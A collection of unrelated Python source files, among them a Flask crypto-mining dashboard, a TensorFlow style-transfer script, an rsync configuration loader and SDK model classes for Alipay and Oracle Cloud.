parameters_O.update(tileparameters_O);
parameters_O.update(specificparameters_O);
return parameters_O;
def make_tileparameters(self,
tileparameters = {},
tileheader='Filter menu',
tiletype='html',
tileid="filtermenu1",
rowid="row1",
colid="col1",
tileclass="panel panel-default",
rowclass="row",
colclass="col-sm-6",
):
'''Make tile parameters
INPUT:
OUTPUT:
'''
if tileparameters:
tileparameters_O=tileparameters;
else:
tileparameters_O = {
'tileheader':tileheader,
'tiletype':tiletype,
'tileid':tileid,
'rowid':rowid,
'colid':colid,
'tileclass':tileclass,
'rowclass':rowclass,
'colclass':colclass
};
self.tileparameters=tileparameters_O;
def make_htmlparameters(self,
htmlparameters={},
htmlid='filtermenuform1',
htmltype='form_01',
htmlspecific={},
):
'''Make html parameters
INPUT:
OUTPUT:
'''
if htmlparameters:
htmlparameters_O=htmlparameters;
else:
htmlparameters_O = {
'htmlid':htmlid,
"htmltype":htmltype,
};
if htmlspecific:
htmlparameters_O.update(htmlspecific);
self.specificparameters=htmlparameters_O;
def make_svgparameters(self,
svgparameters={},
svgtype='volcanoplot2d_01',
svgkeymap=[],
svgid='svg1',
svgmargin={},
svgfilters=None,
svgspecific={},
):
'''make svg parameters
INPUT:
OUTPUT:
'''
if svgparameters:
svgparameters_O=svgparameters;
else:
svgparameters_O = {
"svgtype":svgtype,
"svgkeymap":svgkeymap,
'svgid':svgid,
"svgmargin":svgmargin,
'svgfilters':svgfilters,
};
if svgspecific:
svgparameters_O.update(svgspecific);
self.specificparameters=svgparameters_O;
def make_tableparameters(self,
tableparameters={},
tabletype='responsivetable_01',
tableid='table1',
tableclass="table table-condensed table-hover",
tablefilters=None,
tablespecific={},
):
'''make table parameters
INPUT:
tableparameters = {} of table parameters
tablespecific = {} of table specific parameters
OUTPUT:
'''
if tableparameters:
tableparameters_O=tableparameters;
else:
tableparameters_O = {
"tabletype":tabletype,
'tableid':tableid,
"tableclass":tableclass,
"tablefilters":tablefilters,
}
if tablespecific:
tableparameters_O.update(tablespecific);
self.specificparameters=tableparameters_O; |
<gh_stars>1-10
import warnings
from dataclasses import dataclass
from typing import Dict, Any, Set, Optional
from lucyfer.searchset.fields import BaseSearchField, FieldType
from lucyfer.settings import lucyfer_settings
@dataclass
class SearchSetStorage:
"""
Class provides availability to use fields in SearchSet class
"""
searchset_class: Any
# fields defined in searchset class and those instances
field_name_to_field: Dict[str, BaseSearchField]
fields_to_exclude_from_mapping: Set[str]
fields_to_exclude_from_suggestions: Set[str]
field_class_for_default_searching: Optional[BaseSearchField]
_full_mapping = None
@property
def mapping(self):
"""
Returns mapping for current searchset. Its looks like {field name: field}
That property only contains fields not excluded from original mapping
If you want to get values for some field in mapping - don't. You better use `field_source_to_field`
"""
return {
name: field for name, field in self.field_source_to_field.items()
if name not in self.fields_to_exclude_from_mapping
}
@property
def raw_mapping(self) -> Dict[str, FieldType]:
"""
Caches raw mapping and return it
"""
if not hasattr(self, 'raw_mapping_result'):
result = self.searchset_class._get_raw_mapping()
setattr(self, 'raw_mapping_result', result)
return self.raw_mapping_result
@property
def field_source_to_field(self) -> Dict[str, BaseSearchField]:
"""
Auto generated fields by type checking in raw mapping and sources handling in defined fields
"""
if not hasattr(self, 'field_source_to_field_result'):
# first process raw mapping
source_to_field_from_raw_mapping = {
name: self.searchset_class._field_type_to_field_class.get(
field_type, self.searchset_class._default_field
)(show_suggestions=name not in self.fields_to_exclude_from_suggestions, sources=[name])
for name, field_type in self.raw_mapping.items()
}
# then process defined fields and its sources
source_to_field_from_user_fields = self.field_name_to_field.copy()
source_to_field_from_user_fields_sources = {}
# `missed_fields` uses for process possibly missed sources from case when defined
# some field in searchset like this one:
# x = SearchField(sources=["y"], use_field_class_for_sources=False)
# and when we have not found "y" in raw mapping and we have no idea what field class we need to use.
# it will be warning in the end of function.
missed_fields = []
for name, field in self.field_name_to_field.items():
if not field.sources:
continue
if not field.use_field_class_for_sources:
# we extend missed fields by all fields because after cycle we will filter it anyway
missed_fields.extend([source for source in field.sources])
continue
source_to_field_from_user_fields_sources.update(
{
source: field.__class__(sources=[source],
show_suggestions=source not in self.fields_to_exclude_from_suggestions,
get_available_values_method=field._get_available_values_method,
available_values_method_kwargs=field._available_values_method_kwargs,
use_cache_for_suggestions=field.use_cache_for_suggestions)
for source in field.sources
}
)
# now result
# we create an empty dict and update it by our dicts with order from low to high priority.
# it means if user have wrote field "A" in searchset and we have found field "A" in raw mapping
# priority of searchset is higher, so in result we will see users field, not field from raw mapping.
result = {}
result.update(source_to_field_from_raw_mapping)
result.update(source_to_field_from_user_fields_sources)
result.update(source_to_field_from_user_fields)
# and check default searching field if presented
if self.field_class_for_default_searching:
result.update({lucyfer_settings.FIELD_NAME_FOR_DEFAULT_SEARCH: self.field_class_for_default_searching})
missed_fields = [field for field in missed_fields if field not in result]
if missed_fields:
warnings.warn(f"There is some undefined fields in {self.searchset_class}: {', '.join(missed_fields)}")
setattr(self, "field_source_to_field_result", result)
return self.field_source_to_field_result
|
from Sink import Sink, SinkInfo
from pyjamas.ui.HTML import HTML
from pyjamas.ui.VerticalPanel import VerticalPanel
from SlideLoader import SlideLoader
from pyjamas.HTTPRequest import HTTPRequest
from pyjamas import Window
def esc(txt):
return txt
def urlmap(txt):
idx = txt.find("http://")
if idx == -1:
return esc(txt)
for i in range(idx, len(txt)):
c = txt[i]
if c == ' ' or c == '\n' or c == '\t':
i -= 1
break
i += 1
beg = txt[:idx]
if i == len(txt):
url = txt[idx:]
end = ''
else:
url = txt[idx:i]
end = txt[i:]
txt = esc(beg) + "<a href='%s'>" % url
txt += "%s</a>" % esc(url) + urlmap(end)
return txt
def ts(txt):
l = txt.split('\n')
r = []
for line in l:
r.append(urlmap(line))
return '<br />'.join(r)
class Slide(Sink):
def __init__(self):
Sink.__init__(self)
text="<div class='infoProse'>This is the Kitchen Sink sample. "
self.vp = VerticalPanel()
self.initWidget(self.vp)
self.loaded = False
def onShow(self):
if self.loaded:
return
name = self.name.replace(" ", "_")
name = name.lower()
HTTPRequest().asyncGet("%s.txt" % name, SlideLoader(self))
def setSlide(self, text):
self.loaded = True
ul_stack1 = 0
ul_stack2 = 0
doing_code = 0
txt = ''
text += '\n'
for line in text.split("\n"):
if doing_code:
if line == "}}":
doing_code = 0
line = "</pre>"
txt += line
self.vp.add(HTML(txt))
txt = ''
continue
if line:
txt += line
txt += "\n"
continue
line = line.strip()
ul_line = False
ul_line2 = False
add = False
if not line:
line = " "
elif line[:2] == "{{":
doing_code = 1
if len(line) > 2:
line = "<pre class='slide_code'>%s" % line[2:]
else:
line = "<pre class='slide_code'>"
elif line[:2] == '= ' and line[-2:] == ' =':
line = "<h1 class='slide_heading1'>%s</h1>" % line[2:-2]
elif line[:3] == '== ' and line[-3:] == ' ==':
line = "<h2 class='slide_heading2>%s</h2>" % line[3:-3]
elif line[:2] == '* ':
if not ul_stack1:
txt += "<ul class='slide_list1'>\n"
line = "<li class='slide_listitem1'/>%s\n" % ts(line[2:])
ul_stack1 = True
ul_line = True
elif line[:3] == '** ':
if not ul_stack2:
txt += "<ul class='slide_list2'>\n"
line = "<li class='slide_listitem2'/>%s\n" % ts(line[2:])
ul_stack2 = True
ul_line2 = True
ul_line = True
else:
if not doing_code:
line = "<p class='slide_para'>%s</p>" % line
if ul_stack2 and not ul_line2:
ul_stack2 = False
txt += "</ul>\n"
if ul_stack1 and not ul_line:
ul_stack1 = False
txt += "</ul>\n"
if not ul_stack2 and not ul_stack1 and not doing_code:
add = True
txt += line
if add:
self.vp.add(HTML(txt))
txt = ''
def onError(self, text, code):
self.vp.clear()
self.vp.add(HTML("TODO: Slide '%s' not loaded" % self.name))
self.vp.add(HTML(text))
self.vp.add(HTML(code))
def init(name, desc):
return SinkInfo(name, desc, Slide)
|
from .forms import UserLoginForm
from .models import Algorithm, Base, Currency, CurrencyApi, Pool, PoolAddress, PoolApi, User, Wallet, \
System, OperatingSystem, MiningApp, MiningDevice, Miner, MiningOperation
from .poolapi import CryptonoteApi
from .fixtures.loader import load_json
from germine import currency_api
from .rate import Rate
import click
import flask
from flask import Flask, request, render_template
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_login import LoginManager, current_user, login_user, logout_user, login_required
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.orm.exc import NoResultFound
from urllib.parse import urlparse, urljoin
import json, os
# Devnote: Bug with SQLAlchemy 12.0, must use a later version
# see: https://github.com/flask-admin/flask-admin/issues/1583#issuecomment-355897231
app = Flask(__name__, instance_relative_config=True)
app.config.from_object('germine.config.Default')
# Flask-SQLAlchemy seems to be a dependence of Flask-Admin
db = SQLAlchemy(app)
# see: https://github.com/mitsuhiko/flask-sqlalchemy/issues/98
Base.metadata.create_all(bind=db.engine)
# Flask-Login
login_manager = LoginManager()
login_manager.init_app(app)
# Flask-Admin
admin = Admin(app, name='adminsite', template_mode='bootstrap3')
admin.add_view(ModelView(Algorithm, db.session))
admin.add_view(ModelView(Currency, db.session))
admin.add_view(ModelView(CurrencyApi, db.session))
admin.add_view(ModelView(Wallet, db.session))
admin.add_view(ModelView(PoolAddress, db.session))
admin.add_view(ModelView(PoolApi, db.session))
admin.add_view(ModelView(Pool, db.session))
admin.add_view(ModelView(System, db.session))
admin.add_view(ModelView(OperatingSystem, db.session))
admin.add_view(ModelView(MiningApp, db.session))
admin.add_view(ModelView(MiningDevice, db.session))
admin.add_view(ModelView(Miner, db.session))
admin.add_view(ModelView(MiningOperation, db.session))
# Cached Rate
rate_util = Rate()
# from: http://flask.pocoo.org/snippets/62/
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and \
ref_url.netloc == test_url.netloc
@app.cli.command()
@click.argument("filename")
def json_fixture(filename):
print("Importing json fixture")
if not os.path.isabs(filename):
filename = os.path.join(app.instance_path, filename)
load_json(json.load(open(filename)), db.session)
@app.route("/")
@login_required
def index():
return "Hello, World!"
@login_manager.user_loader
def load_user(user_id):
try:
return db.session.query(User).filter(User.id == int(user_id)).one()
except NoResultFound:
return None
@app.route("/login", methods=["GET", "POST"])
def login():
form = UserLoginForm(request.form)
error = None
if request.method == 'POST' and form.validate():
try:
matched_user = db.session.query(User).filter(User.login == form.login.data).one()
if matched_user.authenticate(form.password.data):
login_user(matched_user)
flask.flash('Logged in successfully')
next = flask.request.args.get('next')
if not is_safe_url(next):
return flask.abort(400)
return flask.redirect(next or flask.url_for('index'))
else:
error = "Invalid credentials"
except NoResultFound:
error = "Invalid credentials"
return render_template('login.html', form=form, error=error)
@app.route('/logout', methods=['GET'])
@login_required
def logout():
logout_user()
return flask.redirect(flask.url_for('login'))
@app.route("/wallets")
def get_wallets():
wallets = db.session.query(Wallet).filter(Wallet.user == current_user)
results = []
for wallet in wallets:
valuation = "NOT IMPLEMENTED"
api_row = db.session.query(CurrencyApi).filter(CurrencyApi.currency == wallet.currency).one_or_none()
if api_row:
ApiClass = getattr(currency_api, api_row.classname)
api = ApiClass(api_row.base_url)
balance = api.get_balance(wallet)
rate = rate_util.get_rate(wallet.currency.name)
valuation = "Confirmed: {}{unit} / {:.2f}$ | Unconfirmed {}{unit} / {:.2f}$" \
.format(balance["balance"], balance["balance"]*rate,
balance["unconfirmed"], balance["unconfirmed"]*rate,
unit=wallet.currency.symbol)
results.append("{}, valuation: {}".format(wallet, valuation))
return render_template('list.html',
label="Wallets for {}".format(current_user.login),
elements=results)
@app.route("/balance-summary/<user>/<pool>")
def balance_summary(user, pool):
# TODO: query by user
wallet = db.session.query(Wallet).all()[0]
pool = db.session.query(Pool).filter(Pool.id==pool).one()
poolapi = CryptonoteApi(pool.api_base_url)
return str(poolapi.get_balance(wallet))
@app.route("/dict")
def todict():
instance = db.session.query(Miner).first()
return str(json.dumps(instance.as_dict()))
@app.route("/api/miningoperation/<user>", methods=["POST"])
def mining_operation(user):
device = db.session.query(MiningDevice) \
.filter(MiningDevice.id_on_system == request.form["device_id_on_system"]) \
.filter(MiningDevice.system.name == request.form["system_name"])
operation = db.session.query(MiningOperation).filter(MininingOperation.mining_device == device) \
.one()
return "Mining Op: {}".format(json.dumps(operation))
|
<filename>styleTransfer.py
import tensorflow as tf
import tensorflow.contrib as contrib
import numpy as np
import scipy.io as sio
import scipy.misc as misc
from PIL import Image
def conv(inputs, w, b):
w = tf.constant(w)
b = tf.constant(b)
return tf.nn.conv2d(inputs, w, [1, 1, 1, 1], "SAME") + b
def mapping(img):
return 255.0 * (img - np.min(img)) / (np.max(img) - np.min(img))
class StyleTransfer:
def __init__(self, H=256, W=256, C=3, alpha=1e-3, beta=1.0, iteration=500, content_path="./content//content.jpg", style_path="./style//style.jpg"):
self.content_img = tf.placeholder("float", [1, H, W, C])
self.style_img = tf.placeholder("float", [1, H, W, C])
self.target_img = tf.get_variable("target", shape=[1, H, W, C], initializer=tf.truncated_normal_initializer(stddev=0.02))
feature_bank_x = self.Network_vgg(self.target_img)
feature_bank_style = self.Network_vgg(self.style_img)
feature_bank_content = self.Network_vgg(self.content_img)
self.L_content = self.content_loss(feature_bank_x, feature_bank_content)
self.L_style = self.style_loss(feature_bank_x, feature_bank_style)
self.total_loss = alpha * self.L_content + beta * self.L_style
# self.Opt = tf.train.AdamOptimizer(0.0002).minimize(self.total_loss)
#L-BFGS
self.optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.total_loss, method='L-BFGS-B',options={'maxiter': iteration, 'disp': 0})
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.train(H, W, C, content_path, style_path)
def train(self, H, W, C, content_path, style_path):
content_img = np.reshape(misc.imresize(np.array(Image.open(content_path)), [H, W], mode="RGB"), [1, H, W, C])
style_img = np.reshape(misc.imresize(np.array(Image.open(style_path)), [H, W], mode="RGB"), [1, H, W, C])
self.sess.run(tf.assign(self.target_img, content_img), feed_dict={self.content_img: content_img, self.style_img: style_img})
self.optimizer.minimize(self.sess, feed_dict={self.content_img: content_img, self.style_img: style_img})
L_content = self.sess.run(self.L_content, feed_dict={self.content_img: content_img, self.style_img: style_img})
L_style = self.sess.run(self.L_style, feed_dict={self.content_img: content_img, self.style_img: style_img})
L_total = self.sess.run(self.total_loss, feed_dict={self.content_img: content_img, self.style_img: style_img})
print("L_content: %g, L_style: %g, L_total: %g" % (L_content, L_style, L_total))
target_img = self.sess.run(self.target_img,feed_dict={self.content_img: content_img, self.style_img: style_img})
Image.fromarray(np.uint8(mapping(np.reshape(target_img, [H, W, C])))).save("./deepdream/target.jpg")
def content_loss(self, feature_bank_x, feature_bank_content):
#content loss
#squared-error
return tf.reduce_sum(tf.square(feature_bank_x["relu4_2"] - feature_bank_content["relu4_2"])) / 2.0
def style_loss(self, feature_bank_x, feature_bank_style):
#style loss
E = 0
for layer in feature_bank_style.keys():
if layer == "relu1_1" or layer=="relu2_1" or layer=="relu3_1" or layer=="relu4_1" or layer=="relu5_1":
w = 0.2
else:
w = 0
C = int(feature_bank_x[layer].shape[-1])
H = int(feature_bank_x[layer].shape[1])
W = int(feature_bank_x[layer].shape[2])
F = tf.reshape(tf.transpose(feature_bank_x[layer], [0, 3, 1, 2]), shape=[C, -1])
#Gram matrix of x
G_x = tf.matmul(F, tf.transpose(F))
C = int(feature_bank_style[layer].shape[-1])
F = tf.reshape(tf.transpose(feature_bank_style[layer], [0, 3, 1, 2]), shape=[C, -1])
#Gram matrix of style
G_s = tf.matmul(F, tf.transpose(F))
E += w * tf.reduce_sum(tf.square(G_x - G_s)) / (4 * C**2 * H**2 * W**2)
return E
def Network_vgg(self, inputs):
vgg_para = sio.loadmat("./vgg_para//vgg.mat")
layers = vgg_para["layers"]
feature_bank = {}
with tf.variable_scope("vgg"):
for i in range(37):
if layers[0, i][0, 0]["type"] == "conv":
w = layers[0, i][0, 0]["weights"][0, 0]
b = layers[0, i][0, 0]["weights"][0, 1]
with tf.variable_scope(str(i)):
inputs = conv(inputs, w, b)
elif layers[0, i][0, 0]["type"] == "relu":
inputs = tf.nn.relu(inputs)
feature_bank[layers[0, i][0, 0]["name"][0]] = inputs
else:
inputs = tf.nn.max_pool(inputs, [1, 2, 2, 1], [1, 2, 2, 1], "SAME")
return feature_bank
if __name__ == "__main__":
st = StyleTransfer(H=512, W=512, C=3, alpha=1e-5, beta=1.0, iteration=500, content_path="./content//content.jpg", style_path="./style//style.jpg") |
# class User:
# _persist_methods = ['get', 'save', 'delete']
#
# def __init__(self, persister):
# self._persister = persister
#
# def __getattr__(self, attribute):
# if attribute in self._persist_methods:
# return getattr(self._persister, attribute)
#
#
# user = User(persister={'gh': 123})
# print(user.get('gh'))
# class ContentFilter(object):
# def __init__(self, filters=None):
# self._filters = list()
# if filters is not None:
# self._filters += filters
#
# def filter(self, content):
# for filter in self._filters:
# content = filter(content)
# return content
#
#
# content = " lfalksdjfaks l kfasdkflasd laskdfjl offensive_filter"
# filter = ContentFilter([
# 'offensive_filter',
# 'ads_filter',
# 'porno_video_filter'])
# filtered_content = filter.filter(content)
# import os
#
#
# class RenameFileCommand(object):
# def __init__(self, from_name, to_name):
# self._from = from_name
# self._to = to_name
#
# def execute(self):
# os.rename(self._from, self._to)
# print(f'from {self._from} to {self._to}')
#
# def undo(self):
# os.rename(self._to, self._from)
# print(f'from {self._from} to {self._to}')
#
#
# class History(object):
# def __init__(self):
# self._commands = list()
#
# def execute(self, command):
# self._commands.append(command)
# print(self._commands)
# command.execute()
#
# def undo(self):
# self._commands.pop().undo()
# # print(self._commands)
#
#
# history = History()
# history.execute(RenameFileCommand('docs/cv.doc', 'docs/cv-en.doc'))
# history.execute(RenameFileCommand('docs/cv1.doc', 'docs/cv-bg.doc'))
# history.undo()
# history.undo()
#
# class Logger(object):
# def __new__(cls, *args, **kwargs):
# if not hasattr(cls, '_logger'):
# cls._logger = super(Logger, cls).__new__(cls, *args, **kwargs)
# return cls._logger
#
# logger = Logger()
# class Command:
#
# def __init__(self, authenticate=None, authorize=None):
# self.authenticate = authenticate or self._not_authenticated
# self.authorize = authorize or self._not_authorized
#
# def execute(self, user, action):
# self.authenticate(user)
# self.authorize(user, action)
# return action()
#
# if in_sudo_mode:
# command = Command(always_authenticated, always_authorized)
# else:
# command = Command(config.authenticate, config.authorize)
# command.execute(current_user, delete_user_action)
# command = Command()
#
# if in_sudo_mode:
# command.authenticate = always_authenticated
# command.authorize = always_authorized
# else:
# command.authenticate = config.authenticate
# command.authorize = config.authorize
# command.execute(current_user, delete_user_action)
# class Car(object):
#
# def __init__(self):
# self._tyres = [Tyre('front_left'),
# Tyre('front_right'),
# Tyre('rear_left'),
# Tyre('rear_right'), ]
# self._tank = Tank(70)
#
# def tyres_pressure(self):
# return [tyre.pressure for tyre in self._tyres]
#
# def fuel_level(self):
# return self._tank.level
# import socket
#
# class SocketWriter(object):
#
# def __init__(self, ip, port):
# self._socket = socket.socket(socket.AF_INET,
# socket.SOCK_DGRAM)
# self._ip = ip
# self._port = port
#
# def write(self, message):
# self._socket.send(message, (self._ip, self._port))
#
# def log(message, destination):
# destination.write('[{}] - {}'.format(datetime.now(), message))
#
# upd_logger = SocketWriter('1.2.3.4', '9999')
# log('Something happened', udp_destination)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiTradeTicketTicketcodeUseModel(object):
def __init__(self):
self._code_type = None
self._gmt_biz = None
self._order_no = None
self._quantity = None
self._request_id = None
self._shop_id = None
self._shop_type = None
self._ticket_code = None
@property
def code_type(self):
return self._code_type
@code_type.setter
def code_type(self, value):
self._code_type = value
@property
def gmt_biz(self):
return self._gmt_biz
@gmt_biz.setter
def gmt_biz(self, value):
self._gmt_biz = value
@property
def order_no(self):
return self._order_no
@order_no.setter
def order_no(self, value):
self._order_no = value
@property
def quantity(self):
return self._quantity
@quantity.setter
def quantity(self, value):
self._quantity = value
@property
def request_id(self):
return self._request_id
@request_id.setter
def request_id(self, value):
self._request_id = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
@property
def shop_type(self):
return self._shop_type
@shop_type.setter
def shop_type(self, value):
self._shop_type = value
@property
def ticket_code(self):
return self._ticket_code
@ticket_code.setter
def ticket_code(self, value):
self._ticket_code = value
def to_alipay_dict(self):
params = dict()
if self.code_type:
if hasattr(self.code_type, 'to_alipay_dict'):
params['code_type'] = self.code_type.to_alipay_dict()
else:
params['code_type'] = self.code_type
if self.gmt_biz:
if hasattr(self.gmt_biz, 'to_alipay_dict'):
params['gmt_biz'] = self.gmt_biz.to_alipay_dict()
else:
params['gmt_biz'] = self.gmt_biz
if self.order_no:
if hasattr(self.order_no, 'to_alipay_dict'):
params['order_no'] = self.order_no.to_alipay_dict()
else:
params['order_no'] = self.order_no
if self.quantity:
if hasattr(self.quantity, 'to_alipay_dict'):
params['quantity'] = self.quantity.to_alipay_dict()
else:
params['quantity'] = self.quantity
if self.request_id:
if hasattr(self.request_id, 'to_alipay_dict'):
params['request_id'] = self.request_id.to_alipay_dict()
else:
params['request_id'] = self.request_id
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
if self.shop_type:
if hasattr(self.shop_type, 'to_alipay_dict'):
params['shop_type'] = self.shop_type.to_alipay_dict()
else:
params['shop_type'] = self.shop_type
if self.ticket_code:
if hasattr(self.ticket_code, 'to_alipay_dict'):
params['ticket_code'] = self.ticket_code.to_alipay_dict()
else:
params['ticket_code'] = self.ticket_code
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiTradeTicketTicketcodeUseModel()
if 'code_type' in d:
o.code_type = d['code_type']
if 'gmt_biz' in d:
o.gmt_biz = d['gmt_biz']
if 'order_no' in d:
o.order_no = d['order_no']
if 'quantity' in d:
o.quantity = d['quantity']
if 'request_id' in d:
o.request_id = d['request_id']
if 'shop_id' in d:
o.shop_id = d['shop_id']
if 'shop_type' in d:
o.shop_type = d['shop_type']
if 'ticket_code' in d:
o.ticket_code = d['ticket_code']
return o
|
<gh_stars>0
"""
Configuration for 'treesync' CLI application
"""
from cli_toolkit.configuration import (
ConfigurationSection,
YamlConfiguration
)
from pathlib_tree.tree import SKIPPED_PATHS
from .constants import (
DEFAULT_CONFIGURATION_PATHS,
DEFAULT_EXCLUDES,
DEFAULT_EXCLUDES_FILE,
DEFAULT_FLAGS,
TREE_CONFIG_FILE
)
from .target import Target
class Defaults(ConfigurationSection):
"""
Tree sync default settings
"""
__name__ = 'defaults'
__default_settings__ = {
'rsync_command': 'rsync',
'flags': DEFAULT_FLAGS,
'never_sync_paths': SKIPPED_PATHS,
'excluded_paths': DEFAULT_EXCLUDES,
'tree_config_file': TREE_CONFIG_FILE,
'tree_excludes_file': DEFAULT_EXCLUDES_FILE,
}
class TargetConfiguration(ConfigurationSection):
"""
Loader for named targets in TargetSettings
"""
__default_settings__ = {
'ignore_default_flags': False,
'ignore_default_excludes': False,
'excludes': [],
'excludes_file': None,
'flags': [],
'iconv': None,
}
__required_settings__ = (
'source',
'destination',
)
@property
def destination_server_settings(self):
"""
Return settings for destination server
"""
try:
# pylint: disable=no-member
host, _path = str(self.destination).split(':', 1)
except ValueError:
return None
# pylint: disable=no-member
return getattr(self.__config_root__.servers, host, None)
@property
def destination_server_flags(self):
"""
Return flags specific to destination server
"""
flags = []
settings = self.destination_server_settings
if settings is not None:
iconv = settings.get('iconv', None)
if iconv is not None:
flags.append(f'--iconv={iconv}')
rsync_path = settings.get('rsync_path', None)
if rsync_path is not None:
flags.append(f'--rsync-path={rsync_path}')
return flags
class ServerSettings(ConfigurationSection):
"""
Server specific common sync settings by server name
Since server names can contain letters that are not valid python identifiers
this category is handled as special case unlike normal ConfigurationSection
"""
__name__ = 'servers'
def __getattribute__(self, attr):
"""
Return server by name
"""
try:
settings = super().__getattribute__('__server_settings__')
if attr in settings:
return settings[attr]
except AttributeError:
pass
return super().__getattribute__(attr)
def __load_dictionary__(self, data):
"""
Load server flag data from dictionary. Keys in dictionary are not required
to be valid python identifiers
"""
self.__server_settings__ = {}
for server, settings in data.items():
# Ensure [] and None are cast to empty settings
if not settings:
settings = {}
self.__server_settings__[server] = settings
class TargetSettings(ConfigurationSection):
"""
Tree sync targets by name
"""
__name__ = 'targets'
__dict_loader_class__ = TargetConfiguration
@property
def names(self):
"""
Get configured target names
"""
names = []
for attr in vars(self):
section = getattr(self, attr)
if isinstance(section, Configuration):
continue
if isinstance(section, self.__dict_loader_class__):
names.append(attr)
return names
def __iter__(self):
targets = [getattr(self, name) for name in self.names]
return iter(targets)
def get_target(self, name):
"""
Get target by name
"""
settings = getattr(self, name, None)
if settings is None:
raise ValueError(f'Invalid target name {name}')
return Target(name, settings)
class Configuration(YamlConfiguration):
"""
Yaml configuration file for 'treesync' CLI
"""
__default_paths__ = DEFAULT_CONFIGURATION_PATHS
__section_loaders__ = (
Defaults,
ServerSettings,
TargetSettings,
)
def __repr__(self):
return 'treesync config'
@property
def sync_targets(self):
"""
Get configured sync targets
"""
targets = []
# pylint: disable=no-member
for name in self.targets.names:
targets.append(self.get_target(name))
return targets
def get_target(self, name):
"""
Get target by name
"""
# pylint: disable=no-member
return self.targets.get_target(name)
|
<gh_stars>0
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ComputePerformanceSummary(object):
"""
Parameters detailing the compute performance for a specified DB system shape.
"""
def __init__(self, **kwargs):
"""
Initializes a new ComputePerformanceSummary object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param cpu_core_count:
The value to assign to the cpu_core_count property of this ComputePerformanceSummary.
:type cpu_core_count: int
:param memory_in_gbs:
The value to assign to the memory_in_gbs property of this ComputePerformanceSummary.
:type memory_in_gbs: float
:param network_bandwidth_in_gbps:
The value to assign to the network_bandwidth_in_gbps property of this ComputePerformanceSummary.
:type network_bandwidth_in_gbps: float
:param network_iops:
The value to assign to the network_iops property of this ComputePerformanceSummary.
:type network_iops: float
:param network_throughput_in_mbps:
The value to assign to the network_throughput_in_mbps property of this ComputePerformanceSummary.
:type network_throughput_in_mbps: float
"""
self.swagger_types = {
'cpu_core_count': 'int',
'memory_in_gbs': 'float',
'network_bandwidth_in_gbps': 'float',
'network_iops': 'float',
'network_throughput_in_mbps': 'float'
}
self.attribute_map = {
'cpu_core_count': 'cpuCoreCount',
'memory_in_gbs': 'memoryInGBs',
'network_bandwidth_in_gbps': 'networkBandwidthInGbps',
'network_iops': 'networkIops',
'network_throughput_in_mbps': 'networkThroughputInMbps'
}
self._cpu_core_count = None
self._memory_in_gbs = None
self._network_bandwidth_in_gbps = None
self._network_iops = None
self._network_throughput_in_mbps = None
@property
def cpu_core_count(self):
"""
**[Required]** Gets the cpu_core_count of this ComputePerformanceSummary.
The number of OCPU cores available.
:return: The cpu_core_count of this ComputePerformanceSummary.
:rtype: int
"""
return self._cpu_core_count
@cpu_core_count.setter
def cpu_core_count(self, cpu_core_count):
"""
Sets the cpu_core_count of this ComputePerformanceSummary.
The number of OCPU cores available.
:param cpu_core_count: The cpu_core_count of this ComputePerformanceSummary.
:type: int
"""
self._cpu_core_count = cpu_core_count
@property
def memory_in_gbs(self):
"""
**[Required]** Gets the memory_in_gbs of this ComputePerformanceSummary.
The amount of memory allocated for the VMDB System.
:return: The memory_in_gbs of this ComputePerformanceSummary.
:rtype: float
"""
return self._memory_in_gbs
@memory_in_gbs.setter
def memory_in_gbs(self, memory_in_gbs):
"""
Sets the memory_in_gbs of this ComputePerformanceSummary.
The amount of memory allocated for the VMDB System.
:param memory_in_gbs: The memory_in_gbs of this ComputePerformanceSummary.
:type: float
"""
self._memory_in_gbs = memory_in_gbs
@property
def network_bandwidth_in_gbps(self):
"""
**[Required]** Gets the network_bandwidth_in_gbps of this ComputePerformanceSummary.
The network bandwidth of the VMDB system in gbps.
:return: The network_bandwidth_in_gbps of this ComputePerformanceSummary.
:rtype: float
"""
return self._network_bandwidth_in_gbps
@network_bandwidth_in_gbps.setter
def network_bandwidth_in_gbps(self, network_bandwidth_in_gbps):
"""
Sets the network_bandwidth_in_gbps of this ComputePerformanceSummary.
The network bandwidth of the VMDB system in gbps.
:param network_bandwidth_in_gbps: The network_bandwidth_in_gbps of this ComputePerformanceSummary.
:type: float
"""
self._network_bandwidth_in_gbps = network_bandwidth_in_gbps
@property
def network_iops(self):
"""
**[Required]** Gets the network_iops of this ComputePerformanceSummary.
IOPS for the VMDB System.
:return: The network_iops of this ComputePerformanceSummary.
:rtype: float
"""
return self._network_iops
@network_iops.setter
def network_iops(self, network_iops):
"""
Sets the network_iops of this ComputePerformanceSummary.
IOPS for the VMDB System.
:param network_iops: The network_iops of this ComputePerformanceSummary.
:type: float
"""
self._network_iops = network_iops
@property
def network_throughput_in_mbps(self):
"""
**[Required]** Gets the network_throughput_in_mbps of this ComputePerformanceSummary.
Network throughput for the VMDB System.
:return: The network_throughput_in_mbps of this ComputePerformanceSummary.
:rtype: float
"""
return self._network_throughput_in_mbps
@network_throughput_in_mbps.setter
def network_throughput_in_mbps(self, network_throughput_in_mbps):
"""
Sets the network_throughput_in_mbps of this ComputePerformanceSummary.
Network throughput for the VMDB System.
:param network_throughput_in_mbps: The network_throughput_in_mbps of this ComputePerformanceSummary.
:type: float
"""
